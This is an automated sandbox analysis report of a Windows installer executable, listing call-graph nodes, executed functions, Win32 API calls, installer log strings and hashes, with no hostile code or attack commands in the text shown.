53444->53455 53445 448620 53447 403420 4 API calls 53445->53447 53446 4486bb 53449 4486c3 GetProcAddress 53446->53449 53450 448700 53447->53450 53448 448655 LoadLibraryA 53448->53455 53452 4486d6 53449->53452 53450->53426 53451 448643 LoadLibraryExA 53451->53455 53452->53445 53453 403b80 4 API calls 53453->53455 53454 403450 4 API calls 53454->53455 53455->53445 53455->53446 53455->53448 53455->53451 53455->53453 53455->53454 53457 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53455->53457 53457->53455 56415 416b3a 56416 416be2 56415->56416 56417 416b52 56415->56417 56434 415314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56416->56434 56418 416b60 56417->56418 56419 416b6c SendMessageA 56417->56419 56421 416b86 56418->56421 56422 416b6a CallWindowProcA 56418->56422 56430 416bc0 56419->56430 56431 41a050 GetSysColor 56421->56431 56422->56430 56425 416b91 SetTextColor 56426 416ba6 56425->56426 56432 41a050 GetSysColor 56426->56432 56428 416bab SetBkColor 56433 41a6d8 GetSysColor CreateBrushIndirect 56428->56433 56431->56425 56432->56428 56433->56430 56434->56430 53458 40ce1c 53461 406f00 WriteFile 53458->53461 53462 406f1d 53461->53462 56435 4980b4 56493 403344 56435->56493 56437 4980c2 56496 4056a0 56437->56496 56439 4980c7 56499 40631c GetModuleHandleA GetProcAddress 56439->56499 56445 4980d6 56516 41094c 56445->56516 56447 4980db 56520 412920 56447->56520 56449 4980e5 56525 419038 GetVersion 56449->56525 56767 4032fc 56493->56767 56495 403349 GetModuleHandleA GetCommandLineA 56495->56437 56497 4056db 56496->56497 56768 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56496->56768 56497->56439 56500 406338 56499->56500 56501 40633f GetProcAddress 56499->56501 56500->56501 56502 406355 GetProcAddress 56501->56502 56503 40634e 56501->56503 56504 406364 SetProcessDEPPolicy 56502->56504 56505 406368 56502->56505 56503->56502 56504->56505 56506 40993c 56505->56506 56769 409014 56506->56769 56511 408710 7 API calls 56512 40995f 56511->56512 56784 409060 GetVersionExA 56512->56784 56515 409b70 6F551CD0 56515->56445 56517 410956 56516->56517 56518 410995 GetCurrentThreadId 56517->56518 56519 4109b0 56518->56519 56519->56447 56786 40aef4 56520->56786 56524 41294c 56524->56449 56798 41de1c 8 API calls 56525->56798 56527 419051 56800 418f30 GetCurrentProcessId 56527->56800 56767->56495 56768->56497 56770 408cac 5 API calls 56769->56770 56771 409025 56770->56771 56772 4085cc GetSystemDefaultLCID 56771->56772 56774 408602 56772->56774 56773 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56773->56774 56774->56773 56775 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56774->56775 56776 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56774->56776 56778 408664 56774->56778 56775->56774 56776->56774 56777 406ddc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56777->56778 56778->56777 56779 408558 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56778->56779 56780 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56778->56780 56781 4086e7 56778->56781 56779->56778 56780->56778 56782 403420 4 API calls 56781->56782 56783 408701 56782->56783 56783->56511 56785 409077 56784->56785 56785->56515 56788 40aefb 56786->56788 56787 40af1a 56790 411004 56787->56790 56788->56787 56797 40ae2c 19 API calls 56788->56797 56791 411026 56790->56791 56792 406ddc 5 API calls 56791->56792 56793 403450 4 API calls 56791->56793 56794 411045 56791->56794 56792->56791 56793->56791 56795 403400 4 API calls 56794->56795 56796 41105a 56795->56796 56796->56524 56797->56788 56799 41de96 56798->56799 56799->56527 56816 4078b0 56800->56816 56817 4078c3 56816->56817 56818 4075a8 19 API calls 56817->56818 56819 4078d7 GlobalAddAtomA GetCurrentThreadId 56818->56819 58075 41663c 58076 4166a3 58075->58076 58077 416649 58075->58077 58083 4162c2 58077->58083 58087 416548 CreateWindowExA 58077->58087 58078 416650 SetPropA SetPropA 58078->58076 58079 416683 58078->58079 58080 416696 SetWindowPos 58079->58080 58080->58076 58084 4162ee 58083->58084 58085 4162ce GetClassInfoA 58083->58085 58084->58078 58085->58084 58086 4162e2 GetClassInfoA 58085->58086 58086->58084 58087->58078 53463 4222dc 53464 4222eb 53463->53464 53469 42126c 53464->53469 53467 42230b 53470 4212db 53469->53470 53484 42127b 53469->53484 53473 4212ec 53470->53473 53494 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53470->53494 53472 42131a 53476 42138d 53472->53476 53481 421335 53472->53481 53473->53472 53475 4213b2 53473->53475 53474 42138b 53477 4213de 53474->53477 53496 421e24 11 API calls 53474->53496 53475->53474 53479 4213c6 SetMenu 53475->53479 53476->53474 53483 4213a1 53476->53483 53497 4211b4 10 API calls 53477->53497 53479->53474 53481->53474 53487 421358 GetMenu 53481->53487 53482 4213e5 53482->53467 53492 4221e0 10 API calls 53482->53492 53486 4213aa SetMenu 53483->53486 53484->53470 53493 408d1c 19 API calls 53484->53493 53486->53474 53488 421362 53487->53488 53489 42137b 53487->53489 53491 421375 SetMenu 53488->53491 53495 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53489->53495 53491->53489 53492->53467 53493->53484 53494->53473 53495->53474 53496->53477 53497->53482

                                                                          Executed Functions

                                                                          Function 004704C8 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 956COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                                          • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                                          • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                                          • Failed to strip read-only attribute., xrefs: 00470CF3
                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                                          • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                                          • Installing the file., xrefs: 00470D29
                                                                          • Time stamp of our file: %s, xrefs: 004707BB
                                                                          • p%G, xrefs: 0047151A
                                                                          • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                                          • Dest filename: %s, xrefs: 004706B4
                                                                          • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                                          • Version of our file: (none), xrefs: 0047091C
                                                                          • Same time stamp. Skipping., xrefs: 00470B75
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                                          • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                                          • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                                          • -- File entry --, xrefs: 0047051B
                                                                          • Non-default bitness: 32-bit, xrefs: 004706DB
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                                          • @, xrefs: 004705D0
                                                                          • Non-default bitness: 64-bit, xrefs: 004706CF
                                                                          • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                                          • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                                          • Will register the file (a type library) later., xrefs: 00471319
                                                                          • InUn, xrefs: 00470F65
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                                          • Dest file exists., xrefs: 004707DB
                                                                          • Same version. Skipping., xrefs: 00470B05
                                                                          • .tmp, xrefs: 00470DD7
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                                          • Time stamp of existing file: %s, xrefs: 0047084B
                                                                          • Version of existing file: (none), xrefs: 00470B1A
                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                                          • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                                          • Stripped read-only attribute., xrefs: 00470CE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                                          • API String ID: 0-1519224904
                                                                          • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                          • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                                          • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                          • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59
                                                                          Function 0042E094 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                                          • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                                          • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 2252812187-1888249752
                                                                          • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                          • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                                          • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                          • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79
                                                                          Function 00450294 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                                          • GetProcAddress.KERNEL32(6E350000,RmStartSession), ref: 004502DD
                                                                          • GetProcAddress.KERNEL32(6E350000,RmRegisterResources), ref: 004502F2
                                                                          • GetProcAddress.KERNEL32(6E350000,RmGetList), ref: 00450307
                                                                          • GetProcAddress.KERNEL32(6E350000,RmShutdown), ref: 0045031C
                                                                          • GetProcAddress.KERNEL32(6E350000,RmRestart), ref: 00450331
                                                                          • GetProcAddress.KERNEL32(6E350000,RmEndSession), ref: 00450346
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                          • API String ID: 1968650500-3419246398
                                                                          • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                          • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                                          • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                          • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C
                                                                          Function 00423C04 Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1767 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1767 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1753 423d1a 1730->1753 1754 423f4e-423f56 1730->1754 1731->1701 1756 42407b-42408d 1731->1756 1733->1701 1755 424143-424144 call 423b7c 1734->1755 1751 424132-424141 1735->1751 1752 424121-424130 1735->1752 1737->1701 1762 423cb1-423cb2 1741->1762 1763 423dc6-423dd4 IsIconic 1741->1763 1764 423ea6-423eb9 call 423b0c 1742->1764 1765 423ed7-423ee8 call 423b7c 1742->1765 1744->1701 1745->1701 1747->1701 1768 423e03-423e11 call 424170 1748->1768 1769 423cdf 1748->1769 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1751->1701 1752->1701 1753->1755 1754->1701 1780 423f5c-423f63 1754->1780 1791 424149 1755->1791 1756->1701 1783 423cb8 1762->1783 1784 423d89-423d91 1762->1784 1773 423de2-423de9 call 423b7c 1763->1773 1774 423dd6-423ddd call 423bb8 1763->1774 1808 423ecb-423ed2 call 423b7c 1764->1808 1809 423ebb-423ec5 call 41ef50 1764->1809 1802 423eea-423ef0 call 41ee9c 1765->1802 1803 423efe-423f06 call 423a7c 1765->1803 1767->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1767->1799 1768->1701 1769->1755 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1755 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                          • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                                          • Opcode Fuzzy Hash: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                          • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09
                                                                          Function 004671CC Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1649windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2185 4671cc-4671e2 2186 4671e4-4671e7 call 402d30 2185->2186 2187 4671ec-4672a3 call 494c88 call 402b30 * 6 2185->2187 2186->2187 2204 4672a5-4672cc call 414634 2187->2204 2205 4672e0-4672f9 2187->2205 2209 4672d1-4672db call 4145f4 2204->2209 2210 4672ce 2204->2210 2211 467336-467344 call 494f90 2205->2211 2212 4672fb-467322 call 414614 2205->2212 2209->2205 2210->2209 2220 467346-467355 call 494dd8 2211->2220 2221 467357-467359 call 494efc 2211->2221 2218 467327-467331 call 4145d4 2212->2218 2219 467324 2212->2219 2218->2211 2219->2218 2226 46735e-4673b1 call 4948ec call 41a3c8 * 2 2220->2226 2221->2226 2233 4673c2-4673d7 call 45142c call 414b10 2226->2233 2234 4673b3-4673c0 call 414b10 2226->2234 2240 4673dc-4673e3 2233->2240 2234->2240 2241 4673e5-467426 call 4146b4 call 4146f8 call 420f90 call 420fbc call 420b60 call 420b8c 2240->2241 2242 46742b-4678b1 call 494d28 call 49504c call 414614 * 3 call 4146b4 call 4145d4 * 3 call 460a24 call 460a3c call 460a48 call 460a90 call 460a24 call 460a3c call 460a48 call 460a90 call 460a3c call 460a90 LoadBitmapA call 41d6a8 call 460a60 call 460a78 call 466fa8 call 468abc call 466628 call 40357c call 414b10 call 466960 call 466968 call 466628 call 40357c * 2 call 414b10 call 468abc call 466628 call 414b10 call 466960 call 466968 call 414b10 * 2 call 468abc call 414b10 * 2 call 466960 call 4145f4 call 466960 call 4145f4 call 468abc call 414b10 call 466960 call 466968 call 468abc call 414b10 call 466960 call 4145f4 * 2 call 414b10 call 466960 call 4145f4 2240->2242 2241->2242 2372 4678b3-46790b call 4145f4 call 414b10 call 466960 call 4145f4 2242->2372 2373 46790d-467926 call 414a3c * 2 2242->2373 2380 46792b-4679dc call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2372->2380 2373->2380 2399 467a16-467c4c call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 4181d8 call 42ed30 call 414b10 call 494d28 call 49504c call 414614 call 466628 call 414b10 call 466960 call 4145f4 call 466628 call 468abc call 466628 call 414b10 call 466960 call 4145f4 call 466968 call 466628 call 414b10 call 466960 2380->2399 2400 4679de-4679f9 2380->2400 2461 467c4e-467c57 2399->2461 2462 467c8d-467d46 call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2399->2462 2401 4679fe-467a11 call 4145f4 2400->2401 2402 4679fb 2400->2402 2401->2399 2402->2401 2461->2462 2463 467c59-467c88 call 414a3c call 466968 2461->2463 2480 467d80-4681a1 call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 414b10 call 494d28 call 49504c call 414614 call 414b10 call 466628 call 468abc call 466628 call 414b10 call 466960 call 466968 call 42bbc8 call 49505c call 44e8a8 call 466628 call 468abc call 466628 call 468abc call 466628 call 468abc * 2 call 414b10 call 466960 call 466968 call 468abc call 4948ec call 41a3c8 call 466628 call 40357c call 414b10 call 466960 call 4145f4 call 414b10 * 2 call 49505c call 403494 call 40357c * 2 call 414b10 2462->2480 2481 467d48-467d63 2462->2481 2463->2462 2580 4681c5-4681cc 2480->2580 2581 4681a3-4681c0 call 44ffb0 call 45010c 2480->2581 2482 467d65 2481->2482 2483 467d68-467d7b call 4145f4 2481->2483 2482->2483 2483->2480 2583 4681f0-4681f7 2580->2583 2584 4681ce-4681eb call 44ffb0 call 45010c 2580->2584 2581->2580 2586 46821b-468261 call 4181d8 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468bb0 2583->2586 2587 4681f9-468216 call 44ffb0 call 45010c 2583->2587 2584->2583 2601 468263-46826a 2586->2601 2602 46827b 2586->2602 2587->2586 2603 468277-468279 2601->2603 2604 46826c-468275 2601->2604 2605 46827d-46828c 2602->2605 2603->2605 2604->2602 2604->2603 2606 4682a6 2605->2606 2607 46828e-468295 2605->2607 2610 4682a8-4682c2 2606->2610 2608 468297-4682a0 2607->2608 2609 4682a2-4682a4 2607->2609 2608->2606 2608->2609 2609->2610 2611 46836b-468372 2610->2611 2612 4682c8-4682d1 2610->2612 2615 468405-468413 call 414b10 2611->2615 2616 468378-46839b call 47bb50 call 403450 2611->2616 2613 4682d3-46832a call 47bb50 call 414b10 call 47bb50 call 414b10 call 47bb50 call 414b10 2612->2613 2614 46832c-468366 call 414b10 * 3 2612->2614 2613->2611 2614->2611 2622 468418-468421 2615->2622 2635 4683ac-4683c0 call 403494 2616->2635 2636 46839d-4683aa call 47bcf0 2616->2636 2626 468427-46843f call 429fd0 2622->2626 2627 468531-468560 call 42b964 call 44e834 2622->2627 2644 4684b6-4684ba 2626->2644 2645 468441-468445 2626->2645 2661 468566-46856a 2627->2661 2662 46860e-468612 2627->2662 2657 4683d2-468403 call 42c7fc call 42cbb8 call 403494 call 414b10 2635->2657 2658 4683c2-4683cd call 403494 2635->2658 2636->2657 2650 4684bc-4684c5 2644->2650 2651 46850a-46850e 2644->2651 2652 468447-468481 call 40b434 call 47bb50 2645->2652 2650->2651 2659 4684c7-4684d2 2650->2659 2655 468522-46852c call 42a054 2651->2655 2656 468510-468520 call 42a054 2651->2656 2712 468483-46848a 2652->2712 2713 4684b0-4684b4 2652->2713 2655->2627 2656->2627 2657->2622 2658->2657 2659->2651 2671 4684d4-4684d8 2659->2671 2663 46856c-46857e call 40b434 2661->2663 2664 468614-46861b 2662->2664 2665 468691-468695 2662->2665 2691 4685b0-4685e7 call 47bb50 call 44cb04 2663->2691 2692 468580-4685ae call 47bb50 call 44cbd4 2663->2692 2664->2665 2674 46861d-468624 2664->2674 2675 468697-4686ae call 40b434 2665->2675 2676 4686fe-468707 2665->2676 2680 4684da-4684fd call 40b434 call 406ab4 2671->2680 2674->2665 2685 468626-468631 2674->2685 2706 4686b0-4686ec call 40b434 call 469824 * 2 call 4696c4 2675->2706 2707 4686ee-4686fc call 469824 2675->2707 2683 468726-46873b call 466d08 call 466a84 2676->2683 2684 468709-468721 call 40b434 call 469824 2676->2684 2723 468504-468508 2680->2723 2724 4684ff-468502 2680->2724 2737 46878d-468797 call 414a3c 